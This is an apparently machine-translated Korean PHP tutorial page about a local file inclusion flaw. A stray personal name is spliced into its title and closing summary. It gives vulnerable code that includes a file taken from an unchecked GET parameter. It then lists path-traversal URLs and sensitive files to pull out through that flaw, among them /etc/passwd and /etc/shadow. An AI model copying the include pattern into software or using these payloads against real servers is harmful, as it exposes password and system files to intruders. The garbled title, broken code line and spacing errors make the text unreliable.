> 백엔드 개발 > PHP 튜토리얼 > pimchanok leuwisetpaibul php는 취약한 코드가 포함된 로컬 파일을 위조합니다.

pimchanok leuwisetpaibul php는 취약한 코드가 포함된 로컬 파일을 위조합니다.

WBOY
풀어 주다: 2016-07-29 08:47:11
원래의
1335명이 탐색했습니다.

코드:

코드 복사 코드는 다음과 같습니다.


$page=$_GET[ 'page' ];
include($page.'php');
?>


이렇게 사용할 수 있습니다
http://www.xxx. com/index.php ?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http: //www.xxx .com/index.php?page=..../../etc/passwd
추가 데이터 가져오기:
etc/profile
etc/services
/etc/ passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/ hackteach의 Environ
/etc/security/limits
/usr/lib/security/mkuser.default

위 내용은 pimchanok leuwisetpaibul의 내용을 포함하여 취약점이 포함된 로컬 파일을 위조하는 pimchanok leuwisetpaibul php용 코드를 소개합니다. PHP 튜토리얼에 관심이 있는 친구들에게 도움이 되기를 바랍니다.

관련 라벨:
원천:php.cn
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿